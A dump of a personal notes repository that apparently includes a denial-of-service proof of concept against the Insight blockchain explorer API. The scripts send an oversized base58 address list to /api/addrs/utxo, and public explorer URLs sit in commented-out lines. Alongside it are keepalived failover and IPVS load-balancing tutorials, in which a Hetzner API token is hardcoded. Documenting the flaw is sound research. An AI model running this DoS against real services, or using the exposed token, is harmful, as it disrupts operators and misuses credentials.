hash.js "^1.0.3" 134 | minimalistic-assert "^1.0.0" 135 | minimalistic-crypto-utils "^1.0.1" 136 | 137 | inherits@^2.0.1, inherits@^2.0.3: 138 | version "2.0.4" 139 | resolved "https://registry.yarnpkg.com/inherits/-/inherits-2.0.4.tgz#0fa2c64f932917c3433a0ded55363aae37416b7c" 140 | integrity sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ== 141 | 142 | md5.js@^1.3.4: 143 | version "1.3.5" 144 | resolved "https://registry.yarnpkg.com/md5.js/-/md5.js-1.3.5.tgz#b5d07b8e3216e3e27cd728d72f70d1e6a342005f" 145 | integrity sha512-xitP+WxNPcTTOgnTJcrhM0xvdPepipPSf3I8EIpGKeFLjt3PlJLIDG3u8EX53ZIubkb+5U2+3rELYpEhHhzdkg== 146 | dependencies: 147 | hash-base "^3.0.0" 148 | inherits "^2.0.1" 149 | safe-buffer "^5.1.2" 150 | 151 | minimalistic-assert@^1.0.0, minimalistic-assert@^1.0.1: 152 | version "1.0.1" 153 | resolved "https://registry.yarnpkg.com/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz#2e194de044626d4a10e7f7fbc00ce73e83e4d5c7" 154 | integrity sha512-UtJcAD4yEaGtjPezWuO9wC4nwUnVH/8/Im3yEHQP4b67cXlD/Qr9hdITCU1xDbSEXg2XKNaP8jsReV7vQd00/A== 155 | 156 | minimalistic-crypto-utils@^1.0.0, minimalistic-crypto-utils@^1.0.1: 157 | version "1.0.1" 158 | resolved "https://registry.yarnpkg.com/minimalistic-crypto-utils/-/minimalistic-crypto-utils-1.0.1.tgz#f6c00c1c0b082246e5c4d99dfb8c7c083b2b582a" 159 | integrity sha1-9sAMHAsIIkblxNmd+4x8CDsrWCo= 160 | 161 | nan@^2.14.0: 162 | version "2.14.0" 163 | resolved "https://registry.yarnpkg.com/nan/-/nan-2.14.0.tgz#7818f722027b2459a86f0295d434d1fc2336c52c" 164 | integrity sha512-INOFj37C7k3AfaNTtX8RhsTw7qRy7eLET14cROi9+5HAVbbHuIWUHEauBv5qT4Av2tWasiTY1Jw6puUNqRJXQg== 165 | 166 | ripemd160@^2.0.0, ripemd160@^2.0.1: 167 | version "2.0.2" 168 | resolved "https://registry.yarnpkg.com/ripemd160/-/ripemd160-2.0.2.tgz#a1c1a6f624751577ba5d07914cbc92850585890c" 169 | integrity sha512-ii4iagi25WusVoiC4B4lq7pbXfAp3D9v5CwfkY33vffw2+pkDjY1D8GaN7spsxvCSx8dkPqOZCEZyfxcmJG2IA== 170 | dependencies: 171 | hash-base "^3.0.0" 172 | inherits "^2.0.1" 173 | 174 | safe-buffer@^5.0.1, safe-buffer@^5.1.1, safe-buffer@^5.1.2: 175 | version "5.2.0" 176 | resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.2.0.tgz#b74daec49b1148f88c64b68d49b1e815c1f2f519" 177 | integrity sha512-fZEwUGbVl7kouZs1jCdMLdt95hdIv0ZeHg6L7qPeciMZhZ+/gdesW4wgTARkrFWEpspjEATAzUGPG8N2jJiwbg== 178 | 179 | secp256k1@^3.7.1: 180 | version "3.7.1" 181 | resolved "https://registry.yarnpkg.com/secp256k1/-/secp256k1-3.7.1.tgz#12e473e0e9a7c2f2d4d4818e722ad0e14cc1e2f1" 182 | integrity sha512-1cf8sbnRreXrQFdH6qsg2H71Xw91fCCS9Yp021GnUNJzWJS/py96fS4lHbnTnouLp08Xj6jBoBB6V78Tdbdu5g== 183 | dependencies: 184 | bindings "^1.5.0" 185 | bip66 "^1.1.5" 186 | bn.js "^4.11.8" 187 | create-hash "^1.2.0" 188 | drbg.js "^1.0.1" 189 | elliptic "^6.4.1" 190 | nan "^2.14.0" 191 | safe-buffer "^5.1.2" 192 | 193 | sha.js@^2.4.0, sha.js@^2.4.8: 194 | version "2.4.11" 195 | resolved "https://registry.yarnpkg.com/sha.js/-/sha.js-2.4.11.tgz#37a5cf0b81ecbc6943de109ba2960d1b26584ae7" 196 | integrity sha512-QMEp5B7cftE7APOjk5Y6xgrbWu+WkLVQwk8JNjZ8nKRciZaByEW6MubieAiToS7+dwvrjGhH8jRXz3MVd0AYqQ== 197 | dependencies: 198 | inherits "^2.0.1" 199 | safe-buffer "^5.0.1" 200 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bs58-time-chart/bs58-time.js: -------------------------------------------------------------------------------- 1 | const worker = require('worker_threads') 2 | 3 | async function mainMaster () { 4 | const path = require('path') 5 | const os = require('os') 6 | const ProgressBar = require('progress') 7 | const plt = require('matplotnode') 8 | 9 | const data = { length: [], time: [] } 10 | const lengthArr = new Array(101).fill(null).map((x, i) => Math.max(10, i * 1000)) 11 | 12 | const threads = Math.max(1, (os.cpus().length / 4) >>> 0) 13 | const bar = new ProgressBar(':bar :percent', { total: lengthArr.length, width: Math.min(80, process.stdout.columns || 50) }) 14 | bar.render() 15 | await Promise.all(new Array(threads).fill(null).map(() => { 16 | return new Promise((resolve) => { 17 | const wrk = new worker.Worker(__filename) 18 | 19 | wrk.on('error', (err) => console.error(`Error from worker#${wrk.threadId}: ${err.message}`)) 20 | wrk.on('exit', (code) => { 21 | if (code !== 0) { 22 | console.error(`Worker#${wrk.threadId} exited with code ${code}`) 23 | } 24 | 25 | resolve() 26 | }) 27 | 28 | wrk.on('message', (result) => { 29 | if (result !== null) { 30 | data.length.push(result.length) 31 | data.time.push(result.time) 32 | bar.tick() 33 | } 34 | 35 | wrk.postMessage(lengthArr.pop()) 36 | }) 37 | }) 38 | })) 39 | bar.render() 40 | 41 | plt.title('bs58 time/length') 42 | plt.xlabel('length, symbols') 43 | plt.ylabel('time, ms') 44 | plt.plot(data.length, data.time, 'marker=.', 'linestyle=None') 45 | plt.save(path.join(__dirname, `${path.parse(__filename).name}.png`)) 46 | } 47 | 48 | async function mainSlave () { 49 | const bs58 = require('bs58') 50 | bs58.encode(Buffer.allocUnsafe(1000).fill(0xff)) // warm-up 51 | 52 | worker.parentPort.on('message', (length) => { 53 | if (length === undefined) { 54 | worker.parentPort.unref() 55 | return 56 | } 57 | 58 | const ts = process.hrtime() 59 | const size = ((length * (Math.log(58) / Math.log(256))) + 1) >>> 0 60 | bs58.encode(Buffer.allocUnsafe(size).fill(0xff)) 61 | const diff = process.hrtime(ts) 62 | const time = diff[0] * 1e3 + diff[1] / 1e6 63 | 64 | worker.parentPort.postMessage({ length, time }) 65 | }) 66 | 67 | worker.parentPort.postMessage(null) 68 | } 69 | 70 | (worker.isMainThread ? mainMaster : mainSlave)().catch((err) => { 71 | console.error(err.stack || err.message) 72 | process.exit(1) 73 | }) 74 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bs58-time-chart/bs58-time.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fanatid/notes/b1f16cd98e547cd7dfe887548b546e5ca6669cdc/2019-08-04-dos-insight-api/bs58-time-chart/bs58-time.png -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bs58-time-chart/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "bs58": "^4.0.1", 4 | "matplotnode": "^0.4.2", 5 | "progress": "^2.0.3" 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/bs58-time-chart/yarn.lock: -------------------------------------------------------------------------------- 1 | # THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. 2 | # yarn lockfile v1 3 | 4 | 5 | base-x@^3.0.2: 6 | version "3.0.6" 7 | resolved "https://registry.yarnpkg.com/base-x/-/base-x-3.0.6.tgz#de047ec95f5f7b99ae63d830a2a894c96538b2cd" 8 | integrity sha512-4PaF8u2+AlViJxRVjurkLTxpp7CaFRD/jo5rPT9ONnKxyhQ8f59yzamEvq7EkriG56yn5On4ONyaG75HLqr46w== 9 | dependencies: 10 | safe-buffer "^5.0.1" 11 | 12 | bs58@^4.0.1: 13 | version "4.0.1" 14 | resolved "https://registry.yarnpkg.com/bs58/-/bs58-4.0.1.tgz#be161e76c354f6f788ae4071f63f34e8c4f0a42a" 15 | integrity sha1-vhYedsNU9veIrkBx9j806MTwpCo= 16 | dependencies: 17 | base-x "^3.0.2" 18 | 19 | matplotnode@^0.4.2: 20 | version "0.4.2" 21 | resolved "https://registry.yarnpkg.com/matplotnode/-/matplotnode-0.4.2.tgz#9ddc508f798eac458fdfcf89a315981b7d8ecbc2" 22 | integrity sha512-PvamLgebQbPQ9eJs8bkyODnabWRmKivAAgEuP9Kg8gpXiEUwPFL3cPfLfZtHQhqYCwmzjIsMjrWfz2UPf2jrUA== 23 | 24 | progress@^2.0.3: 25 | version "2.0.3" 26 | resolved "https://registry.yarnpkg.com/progress/-/progress-2.0.3.tgz#7e8cf8d8f5b8f239c1bc68beb4eb78567d572ef8" 27 | integrity sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA== 28 | 29 | safe-buffer@^5.0.1: 30 | version "5.2.0" 31 | resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.2.0.tgz#b74daec49b1148f88c64b68d49b1e815c1f2f519" 32 | integrity sha512-fZEwUGbVl7kouZs1jCdMLdt95hdIv0ZeHg6L7qPeciMZhZ+/gdesW4wgTARkrFWEpspjEATAzUGPG8N2jJiwbg== 33 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/insight-api-dos/gen-post-body.js: -------------------------------------------------------------------------------- 1 | const fs = require('fs') 2 | const path = require('path') 3 | 4 | const bs58 = require('bs58') 5 | bs58.encode(Buffer.allocUnsafe(1000).fill(0xff)) // warm-up 6 | 7 | const ssize = 99980 8 | const size = ((ssize * (Math.log(58) / Math.log(256))) + 1) >>> 0 9 | const bs58s = bs58.encode(Buffer.allocUnsafe(size).fill(0xff)) 10 | fs.writeFileSync(path.join(__dirname, 'insight-dos-addrs.json'), `{"addrs":"${bs58s}"}`, 'utf-8') 11 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/insight-api-dos/insight-dos.js: -------------------------------------------------------------------------------- 1 | const https = require('https') 2 | const fs = require('fs') 3 | const path = require('path') 4 | 5 | const insightURL = null 6 | // const insightURL = 'https://insight.bitpay.com' 7 | // const insightURL = 'https://ravencoin.network' 8 | // const insightURL = 'https://blockdozer.com' 9 | // const insightURL = 'https://digiexplorer.info' 10 | 11 | async function makeRequest (url, opts, data) { 12 | return new Promise((resolve, reject) => { 13 | const req = https.request(url, opts) 14 | req.on('error', reject) 15 | req.on('timeout', () => { 16 | req.abort() 17 | reject(new Error('Timeout error')) 18 | }) 19 | req.on('response', (resp) => { 20 | if (resp.statusCode !== 200) { 21 | return reject(new Error(resp.statusMessage)) 22 | } 23 | 24 | const chunks = [] 25 | resp.on('data', (chunk) => chunks.push(chunk)) 26 | resp.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) 27 | }) 28 | 29 | req.end(data) 30 | }) 31 | } 32 | 33 | async function getBestBlockHash (timeout) { 34 | try { 35 | const data = await makeRequest(`${insightURL}/api/status?q=getBestBlockHash`, { timeout }) 36 | return JSON.parse(data).bestblockhash 37 | } catch (err) { 38 | if (err.message === 'Timeout error') return 'Timeout' 39 | 40 | throw err 41 | } 42 | } 43 | 44 | let callDoSId = 0 45 | const callDoSBody = fs.readFileSync(path.join(__dirname, `${path.parse(__filename).name}-body.json`), 'utf-8').trim() 46 | async function callDoS () { 47 | const id = ++callDoSId 48 | log(`Start DoS call id#${id}`) 49 | const ts = diffTime() 50 | try { 51 | const headers = { 'Content-Type': 'application/json' } 52 | await makeRequest(`${insightURL}/api/addrs/utxo`, { method: 'POST', headers }, callDoSBody) 53 | } catch (err) { 54 | log(`DoS call id#${id} error: ${err.message}`) 55 | } 56 | log(`DoS call id#${id} done in ${diffTime(ts).toFixed(2)}ms`) 57 | } 58 | 59 | function log (msg) { 60 | console.log(`${new Date().toISOString()} ${msg}`) 61 | } 62 | 63 | function diffTime (time) { 64 | if (time === undefined) return process.hrtime() 65 | 66 | const diff = process.hrtime(time) 67 | return diff[0] * 1e3 + diff[1] / 1e6 68 | } 69 | 70 | async function delay (ms) { 71 | await new Promise((resolve) => setTimeout(resolve, ms).unref()) 72 | } 73 | 74 | ;(async () => { 75 | const count = 1 76 | const dos = Promise.all(new Array(count).fill(null).map(async (x, i) => { 77 | await delay(i * 200) 78 | await callDoS() 79 | })).then(() => 'done') 80 | 81 | const getStatus = async (timeout) => { 82 | const ts = diffTime() 83 | const hash = await getBestBlockHash(timeout) 84 | const diff = diffTime(ts) 85 | log(`Best hash: ${hash} (${diff.toFixed(2)}ms)`) 86 | return diff 87 | } 88 | 89 | while (true) { 90 | const callTimeout = 3000 91 | const elapsed = await getStatus(callTimeout) 92 | 93 | const timeout = Math.max(100, callTimeout - elapsed) 94 | const st = await Promise.race([dos, delay(timeout)]) 95 | if (st === 'done') break 96 | } 97 | 98 | await getStatus(30000) 99 | })().catch((err) => { 100 | console.error(err.stack || err) 101 | process.exit(1) 102 | }) 103 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/insight-api-dos/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "bs58": "^4.0.1" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /2019-08-04-dos-insight-api/insight-api-dos/yarn.lock: -------------------------------------------------------------------------------- 1 | # THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. 2 | # yarn lockfile v1 3 | 4 | 5 | base-x@^3.0.2: 6 | version "3.0.6" 7 | resolved "https://registry.yarnpkg.com/base-x/-/base-x-3.0.6.tgz#de047ec95f5f7b99ae63d830a2a894c96538b2cd" 8 | integrity sha512-4PaF8u2+AlViJxRVjurkLTxpp7CaFRD/jo5rPT9ONnKxyhQ8f59yzamEvq7EkriG56yn5On4ONyaG75HLqr46w== 9 | dependencies: 10 | safe-buffer "^5.0.1" 11 | 12 | bs58@^4.0.1: 13 | version "4.0.1" 14 | resolved "https://registry.yarnpkg.com/bs58/-/bs58-4.0.1.tgz#be161e76c354f6f788ae4071f63f34e8c4f0a42a" 15 | integrity sha1-vhYedsNU9veIrkBx9j806MTwpCo= 16 | dependencies: 17 | base-x "^3.0.2" 18 | 19 | safe-buffer@^5.0.1: 20 | version "5.2.0" 21 | resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.2.0.tgz#b74daec49b1148f88c64b68d49b1e815c1f2f519" 22 | integrity sha512-fZEwUGbVl7kouZs1jCdMLdt95hdIv0ZeHg6L7qPeciMZhZ+/gdesW4wgTARkrFWEpspjEATAzUGPG8N2jJiwbg== 23 | -------------------------------------------------------------------------------- /2019-08-06-hetzner-cloud-internal-failover-ip/README.md: -------------------------------------------------------------------------------- 1 | # Internal failover IP in Hetzner Cloud 2 | 3 | It's great when in cloud you can just click-click or create highly-availale loadbalancer through API (or with tools like [Terraform](https://www.terraform.io/)). But what if you need implement custom checks or your cloud not provide HA loadbalancers? Or even more, you use bare metal. In such case you can implement it yourself. 4 | 5 | In this note I'll describe how IP failover can be done in [Hetzner Cloud](https://www.hetzner.com/cloud). I'll talk about internal failover IP, but implement same for public address should not have big difference. 6 | 7 | ### Infrastructure 8 | 9 | ![Alt text](https://g.gravizo.com/source/graphviz1?https://raw.githubusercontent.com/fanatid/notes/master/2019-08-06-hetzner-cloud-internal-failover-ip/README.md) 10 | 54 | 55 | We will create 3 servers (`cx11` enough for us here), one with IP `10.0.2.0` we will use for sending HTTP requests to `10.0.1.1`. On two other servers where we will start nginx which will reply with server hostname. If one of them will go down other should re-assign ip `10.0.1.1` to itself and reply to HTTP requests. HTTP response of course will be changed. 56 | 57 | I created Terraform code, so all this can be easily created with few commands (do not forget change Hetzner API Token and SSH key in [tf/variables.tf](tf/variables.tf)!): 58 | 59 | ```bash 60 | terraform init 61 | terraform apply 62 | ``` 63 | 64 | After apply, you should see nearly such output: 65 | 66 | ```bash 67 | Apply complete! Resources: 10 added, 0 changed, 0 destroyed. 68 | 69 | Outputs: 70 | 71 | ip4_map = { 72 | "10.0.1.2" = "116.203.202.19" 73 | "10.0.1.3" = "159.69.190.43" 74 | "10.0.2.1" = "116.203.201.188" 75 | } 76 | nginx0_cmd = hcloud server change-alias-ips --network 7578 --clear 3080230 && hcloud server change-alias-ips --network 7578 --alias-ips 10.0.1.1 3080229 77 | nginx1_cmd = hcloud server change-alias-ips --network 7578 --clear 3080229 && hcloud server change-alias-ips --network 7578 --alias-ips 10.0.1.1 3080230 78 | ``` 79 | 80 | Here you can see public IP address for connecting through SSH. Next two lines are commands which we will need use later, right now just save them. 81 | 82 | ### Keepalived 83 | 84 | For creating failover IP we will use [keepalived](https://www.keepalived.org/). 85 | 86 | On both nginx servers (`10.0.1.2` & `10.0.1.3`) we need do almost identical actions: 87 | 88 | 1) Install [nginx](https://nginx.org/) and `keepalived`: 89 | 90 | ```bash 91 | apt install -y nginx keepalived 92 | ``` 93 | 94 | and save `hostname` to `index.html`: 95 | 96 | ```bash 97 | hostname > /var/www/html/index.html 98 | ``` 99 | 100 | 2) Install [hcloud](https://github.com/hetznercloud/cli): 101 | 102 | `hcloud` is command-line tool for Hetzner Cloud. Problem is that servers not choose IP's ourself, instead we assign IP's through API and then Hetzner Cloud attach network interface to VM where OS start DHCP client which ask about IP and receive which we assigned. We also can add alias IP's, but they need to be added manually (`ip address add 10.0.1.1 ens10`). So, if we want floating IP in Hetzner Private Network we need set IP to each server and add alias which can be assigned only to one server. If server with aliased IP will go down we need automatically re-assign alias to another server and for this we will use `hcloud`. Unfortunately for this we need we need use Hetzner API Token. 103 | 104 | ```bash 105 | curl --location --silent --output - https://github.com/hetznercloud/cli/releases/download/v1.13.0/hcloud-linux-amd64-v1.13.0.tar.gz | tar -zxO hcloud-linux-amd64-v1.13.0/bin/hcloud > /usr/local/bin/hcloud 106 | chmod +x /usr/local/bin/hcloud 107 | 108 | vim /etc/keepalived/ens10-ip.sh 109 | chmod 700 /etc/keepalived/ens10-ip.sh 110 | ``` 111 | 112 | I added example with `vim` because if we run command which add content to script, this will be stored in `~/.bashrc` some time. It's also important set permission `700`, because only `root` should have access to this script due to Token. 113 | 114 | Content for `nginx0`: 115 | 116 | ```bash 117 | export HCLOUD_TOKEN=xKUf7qJRrGUNKmDsn5RgrfXt2xgy90rSOhElVGZm18tx3nhTYCqgLVwIHR0mKn0y 118 | hcloud server change-alias-ips --network 7578 --clear 3080230 && hcloud server change-alias-ips --network 7578 --alias-ips 10.0.1.1 3080229 119 | ``` 120 | 121 | Content for `nginx1`: 122 | 123 | ```bash 124 | export HCLOUD_TOKEN=xKUf7qJRrGUNKmDsn5RgrfXt2xgy90rSOhElVGZm18tx3nhTYCqgLVwIHR0mKn0y 125 | hcloud server change-alias-ips --network 7578 --clear 3080229 && hcloud server change-alias-ips --network 7578 --alias-ips 10.0.1.1 3080230 126 | ``` 127 | 128 | For server with hostname `nginx0` we need `nginx0_cmd` from Terraform output, for `nginx1` — `nginx1_cmd`. 129 | 130 | What this commands do? First command remove all alias IP's from another server and second add alias IP to current server. This commands are same except vice versa `Server ID` which placed at the end of each command. 131 | 132 | 3) Add configuration for `keepalived`: 133 | 134 | `/etc/keepalived/keepalived.conf`: 135 | 136 | ```bash 137 | global_defs { 138 | script_user root 139 | enable_script_security 140 | } 141 | 142 | vrrp_script chk_nginx { 143 | script "/usr/bin/killall -0 nginx" 144 | interval 1 145 | timeout 1 146 | rise 1 147 | fall 2 148 | } 149 | 150 | vrrp_instance hetzner { 151 | state BACKUP 152 | interface ens10 153 | track_interface { 154 | ens10 155 | } 156 | track_script { 157 | chk_nginx 158 | } 159 | unicast_peer { 160 | 10.0.1.2 161 | 10.0.1.3 162 | } 163 | virtual_router_id 42 164 | priority 100 165 | virtual_ipaddress { 166 | 10.0.1.1/32 dev ens10 167 | } 168 | nopreempt 169 | notify_master /etc/keepalived/ens10-ip.sh 170 | } 171 | ``` 172 | 173 | Config is same for both servers, `unicast_peer` used because I did not figured out how make multicast work in Hetzner Private Network :confused: (If you know, please let me know!). 174 | 175 | I decide not create different config (`MASTER` state sv `BACKUP` state) because I think that nodes should be equal. In current config only one server will be `MASTER` in the end. Important thing here that when server came `MASTER`, `keepalived` call our script which re-assign alias IP to this server. 176 | 177 | We also need edit `keepalived.service` because on system startup `keepalived` start before `ens10` will be created, which cause `keepalived` stop. 178 | 179 | `systemctl edit keepalived.service`: 180 | 181 | ```bash 182 | [Unit] 183 | After=hc-net-ifup@ens10.service 184 | 185 | [Service] 186 | ExecStartPre=/bin/sleep 5 187 | ``` 188 | 189 | Now we can enable and start `keepalived`: `systemctl enable keepalived.service --now`. 190 | 191 | ### Testing 192 | 193 | For testing you need SSH to testing server (`10.0.2.1`). Since we just launched `keepalived` IP `10.0.1.1` should be assigned to some node (it's obviously will be node where `keepalived` started earlier): 194 | 195 | ```bash 196 | curl 10.0.1.1 197 | > nginx0 198 | ``` 199 | 200 | Now we can reboot `nginx0` server (or shutdown `keepalived` / `nginx`) and IP will be assigned to `nginx1`: 201 | 202 | ```bash 203 | curl 10.0.1.1 204 | > nginx1 205 | ``` 206 | 207 | It's really cool things! 208 | -------------------------------------------------------------------------------- /2019-08-06-hetzner-cloud-internal-failover-ip/tf/main.tf: -------------------------------------------------------------------------------- 1 | provider "hcloud" { 2 | version = "~> 1.11" 3 | token = "${var.hcloud_token}" 4 | } 5 | 6 | # SSH keys 7 | resource "hcloud_ssh_key" "default" { 8 | count = "${length(var.ssh_keys)}" 9 | 10 | name = "${keys(var.ssh_keys)[count.index]}" 11 | public_key = "${values(var.ssh_keys)[count.index]}" 12 | } 13 | 14 | # Private Network and subnets 15 | resource "hcloud_network" "default" { 16 | name = "LVS Example" 17 | ip_range = "10.0.0.0/8" 18 | } 19 | 20 | resource "hcloud_network_subnet" "nginx" { 21 | network_id = "${hcloud_network.default.id}" 22 | type = "server" 23 | network_zone = "eu-central" 24 | ip_range = "10.0.1.0/24" 25 | } 26 | 27 | resource "hcloud_network_subnet" "client" { 28 | network_id = "${hcloud_network.default.id}" 29 | type = "server" 30 | network_zone = "eu-central" 31 | ip_range = "10.0.2.0/24" 32 | } 33 | 34 | # NGINX0 35 | resource "hcloud_server" "nginx0" { 36 | name = "nginx0" 37 | image = "ubuntu-18.04" 38 | server_type = "cx11-ceph" 39 | datacenter = "nbg1-dc3" 40 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 41 | } 42 | 43 | resource "hcloud_server_network" "nginx0_network" { 44 | network_id = "${hcloud_network.default.id}" 45 | server_id = "${hcloud_server.nginx0.id}" 46 | ip = "10.0.1.2" 47 | } 48 | 49 | # NGINX1 50 | resource "hcloud_server" "nginx1" { 51 | name = "nginx1" 52 | image = "ubuntu-18.04" 53 | server_type = "cx11-ceph" 54 | datacenter = "fsn1-dc14" 55 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 56 | } 57 | 58 | resource "hcloud_server_network" "nginx1_network" { 59 | network_id = "${hcloud_network.default.id}" 60 | server_id = "${hcloud_server.nginx1.id}" 61 | ip = "10.0.1.3" 62 | } 63 | 64 | # client 65 | resource "hcloud_server" "client" { 66 | name = "client" 67 | image = "ubuntu-18.04" 68 | server_type = "cx11-ceph" 69 | datacenter = "nbg1-dc3" 70 | ssh_keys = "${hcloud_ssh_key.default[*].name}" 71 | } 72 | 73 | resource "hcloud_server_network" "client_network" { 74 | network_id = "${hcloud_network.default.id}" 75 | server_id = "${hcloud_server.client.id}" 76 | ip = "10.0.2.1" 77 | } 78 | -------------------------------------------------------------------------------- /2019-08-06-hetzner-cloud-internal-failover-ip/tf/outputs.tf: -------------------------------------------------------------------------------- 1 | output "ip4_map" { 2 | description = "Map of private ipv4 to public ipv4" 3 | value = { 4 | "${hcloud_server_network.nginx0_network.ip}" = "${hcloud_server.nginx0.ipv4_address}" 5 | "${hcloud_server_network.nginx1_network.ip}" = "${hcloud_server.nginx1.ipv4_address}" 6 | "${hcloud_server_network.client_network.ip}" = "${hcloud_server.client.ipv4_address}" 7 | } 8 | } 9 | 10 | output "nginx0_cmd" { 11 | description = "nginx0 cmd for re-assign aliased ip" 12 | value = "hcloud server change-alias-ips --network ${hcloud_network.default.id} --clear ${hcloud_server.nginx1.id} && hcloud server change-alias-ips --network ${hcloud_network.default.id} --alias-ips 10.0.1.1 ${hcloud_server.nginx0.id}" 13 | } 14 | 15 | output "nginx1_cmd" { 16 | description = "nginx1 cmd for re-assign aliased ip" 17 | value = "hcloud server change-alias-ips --network ${hcloud_network.default.id} --clear ${hcloud_server.nginx0.id} && hcloud server change-alias-ips --network ${hcloud_network.default.id} --alias-ips 10.0.1.1 ${hcloud_server.nginx1.id}" 18 | } 19 | -------------------------------------------------------------------------------- /2019-08-06-hetzner-cloud-internal-failover-ip/tf/variables.tf: -------------------------------------------------------------------------------- 1 | variable "hcloud_token" { 2 | type = string 3 | description = "Hetzner Cloud API Token" 4 | 5 | default = "xKUf7qJRrGUNKmDsn5RgrfXt2xgy90rSOhElVGZm18tx3nhTYCqgLVwIHR0mKn0y" 6 | } 7 | 8 | variable "ssh_keys" { 9 | type = map(string) 10 | description = "Map of SSH Keys on servers by default, name => key" 11 | 12 | default = { 13 | "Kirill Fomichev" = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb fanatid@ya.ru" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /2019-08-18-loadbalancer-iptables-ipvs/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM nginx:1.17.2-alpine 2 | 3 | RUN apk add --no-cache curl iptables ipvsadm tcpdump 4 | -------------------------------------------------------------------------------- /2019-08-18-loadbalancer-iptables-ipvs/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | balancer0: 5 | build: . 6 | hostname: balancer0 7 | networks: 8 | loadbalancer: 9 | ipv4_address: 172.31.0.2 10 | cap_add: 11 | - NET_ADMIN 12 | command: sh -c "while true; do sleep 1; done" 13 | stop_signal: SIGKILL 14 | restart: on-failure 15 | 16 | nginx0: 17 | build: . 18 | hostname: nginx0 19 | networks: 20 | loadbalancer: 21 | ipv4_address: 172.31.2.0 22 | cap_add: 23 | - NET_ADMIN 24 | sysctls: 25 | net.ipv4.conf.eth0.arp_ignore: 1 26 | net.ipv4.conf.eth0.arp_announce: 2 27 | command: sh -c 'ln -sf /etc/hostname /usr/share/nginx/html/index.html && nginx -g "daemon off;"' 28 | restart: on-failure 29 | 30 | nginx1: 31 | build: . 32 | hostname: nginx1 33 | networks: 34 | loadbalancer: 35 | ipv4_address: 172.31.2.1 36 | cap_add: 37 | - NET_ADMIN 38 | sysctls: 39 | net.ipv4.conf.eth0.arp_ignore: 1 40 | net.ipv4.conf.eth0.arp_announce: 2 41 | command: sh -c 'ln -sf /etc/hostname /usr/share/nginx/html/index.html && nginx -g "daemon off;"' 42 | restart: on-failure 43 | 44 | networks: 45 | loadbalancer: 46 | ipam: 47 | config: 48 | - subnet: 172.31.0.0/16 49 | -------------------------------------------------------------------------------- /2019-08-18-virtual-server-with-keepalived/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM nginx:1.17.2-alpine 2 | 3 | RUN apk add --no-cache keepalived 4 | 5 | COPY ./keepalived.conf /etc/keepalived/keepalived.conf 6 | -------------------------------------------------------------------------------- /2019-08-18-virtual-server-with-keepalived/README.md: -------------------------------------------------------------------------------- 1 | # Virtual Server with keepalived 2 | 3 | I already described how setup [failover IP with keepalived](../2019-08-06-hetzner-cloud-internal-failover-ip) and how use [IPVS](../2019-08-18-loadbalancer-iptables-ipvs) for load balancing, but keepalive can be used for Virtual Server and this note show how do this. 4 | 5 | ## Infrastructure 6 | 7 | In this note we will use docker containers again, it's enough for demonstration. 8 | 9 | Docker image ([Dockerfile](./Dockerfile)) built on `nginx:1.17.2-alpine`, we also add [keepalived](https://www.keepalived.org/) and copy [keepalived.conf](./keepalived.conf) to `/etc/keepalived/keepalived.conf`. 10 | 11 | [docker-compose.yml](./docker-compose.yml) define 4 containers: 2 nginx and 2 virtual servers (it's possible and better locate nginx and virtual server at one instance, but for demonstration in containers easier use them in different containers). 12 | 13 | - `nginx0` — `172.31.1.0` 14 | - `nginx1` — `172.31.1.1` 15 | - `vs0` — `172.31.2.0` 16 | - `vs1` — `172.31.2.1` 17 | 18 | Our Virtual IP will be `172.31.2.2`. For all containers we need `NET_ADMIN` capability, because we need do network management in each container. NGINX containers also have sysctl options for ARP and they add our Virtual IP to loopback interface on container startup. They also link hostname to `index.html`, so launched [NGINX](https://www.nginx.com/) start response with container hostname. `vs` containers adjust `keepalived.conf` on startup and run `keepalived` without demonization. 19 | 20 | For starting and stopping you can use: 21 | 22 | ```bash 23 | docker-compose -p keepalived up --build -d 24 | docker-compose -p keepalived down 25 | ``` 26 | 27 | ### keepalived.conf 28 | 29 | Most important thing in this note is [keepalived.conf](./keepalived.conf). 30 | 31 | In `vrrp_instance` section we 